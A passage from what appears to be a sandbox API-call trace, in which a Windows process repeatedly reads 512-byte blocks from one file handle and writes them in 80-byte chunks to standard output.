lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.844] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.844] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.844] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.844] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.844] GetFileType (hFile=0x50) returned 0x1 [0119.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.844] GetFileType (hFile=0x50) returned 0x1 [0119.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.844] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.844] GetFileType (hFile=0x50) returned 0x1 [0119.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.844] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.844] GetFileType (hFile=0x50) returned 0x1 [0119.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.844] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.844] GetFileType (hFile=0x50) returned 0x1 [0119.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.844] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.844] GetFileType (hFile=0x50) returned 0x1 [0119.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.844] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.845] GetFileType (hFile=0x50) returned 0x1 [0119.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.845] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.845] GetFileType (hFile=0x50) returned 0x1 [0119.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.845] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.845] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.845] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.845] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.845] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.845] GetFileType (hFile=0x50) returned 0x1 [0119.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.845] GetFileType (hFile=0x50) returned 0x1 [0119.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.845] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.845] GetFileType (hFile=0x50) returned 0x1 [0119.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.846] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.846] GetFileType (hFile=0x50) returned 0x1 [0119.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.846] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.846] GetFileType (hFile=0x50) returned 0x1 [0119.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.846] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.846] GetFileType (hFile=0x50) returned 0x1 [0119.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.846] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.846] GetFileType (hFile=0x50) returned 0x1 [0119.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.846] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.846] GetFileType (hFile=0x50) returned 0x1 [0119.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.846] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.846] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.846] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.847] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.847] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.847] GetFileType (hFile=0x50) returned 0x1 [0119.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.847] GetFileType (hFile=0x50) returned 0x1 [0119.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.847] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.847] GetFileType (hFile=0x50) returned 0x1 [0119.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.847] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.847] GetFileType (hFile=0x50) returned 0x1 [0119.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.847] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.847] GetFileType (hFile=0x50) returned 0x1 [0119.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.847] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.847] GetFileType (hFile=0x50) returned 0x1 [0119.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.847] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.848] GetFileType (hFile=0x50) returned 0x1 [0119.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.848] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.848] GetFileType (hFile=0x50) returned 0x1 [0119.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.848] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.848] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.848] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.848] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.848] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.848] GetFileType (hFile=0x50) returned 0x1 [0119.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.848] GetFileType (hFile=0x50) returned 0x1 [0119.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.854] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.854] GetFileType (hFile=0x50) returned 0x1 [0119.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.855] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.855] GetFileType (hFile=0x50) returned 0x1 [0119.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.855] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.855] GetFileType (hFile=0x50) returned 0x1 [0119.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.855] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.855] GetFileType (hFile=0x50) returned 0x1 [0119.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.855] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.855] GetFileType (hFile=0x50) returned 0x1 [0119.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.855] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.855] GetFileType (hFile=0x50) returned 0x1 [0119.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.855] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.855] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.855] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.856] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.856] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.856] GetFileType (hFile=0x50) returned 0x1 [0119.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.856] GetFileType (hFile=0x50) returned 0x1 [0119.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.856] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.856] GetFileType (hFile=0x50) returned 0x1 [0119.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.856] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.856] GetFileType (hFile=0x50) returned 0x1 [0119.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.856] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.856] GetFileType (hFile=0x50) returned 0x1 [0119.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.856] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.856] GetFileType (hFile=0x50) returned 0x1 [0119.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.856] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.857] GetFileType (hFile=0x50) returned 0x1 [0119.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.857] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.857] GetFileType (hFile=0x50) returned 0x1 [0119.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.857] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.857] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.857] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.857] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.857] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.857] GetFileType (hFile=0x50) returned 0x1 [0119.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.857] GetFileType (hFile=0x50) returned 0x1 [0119.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.857] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.857] GetFileType (hFile=0x50) returned 0x1 [0119.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.857] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.858] GetFileType (hFile=0x50) returned 0x1 [0119.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.858] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.858] GetFileType (hFile=0x50) returned 0x1 [0119.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.858] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.858] GetFileType (hFile=0x50) returned 0x1 [0119.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.858] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.858] GetFileType (hFile=0x50) returned 0x1 [0119.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.858] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.858] GetFileType (hFile=0x50) returned 0x1 [0119.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.858] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.858] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.858] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.858] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.858] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.859] GetFileType (hFile=0x50) returned 0x1 [0119.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.859] GetFileType (hFile=0x50) returned 0x1 [0119.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.859] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.859] GetFileType (hFile=0x50) returned 0x1 [0119.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.859] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.859] GetFileType (hFile=0x50) returned 0x1 [0119.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.859] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.859] GetFileType (hFile=0x50) returned 0x1 [0119.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.859] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.859] GetFileType (hFile=0x50) returned 0x1 [0119.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.859] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.859] GetFileType (hFile=0x50) returned 0x1 [0119.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.860] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.860] GetFileType (hFile=0x50) returned 0x1 [0119.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.860] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.860] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.860] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.860] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.860] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.860] GetFileType (hFile=0x50) returned 0x1 [0119.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.860] GetFileType (hFile=0x50) returned 0x1 [0119.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.860] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, 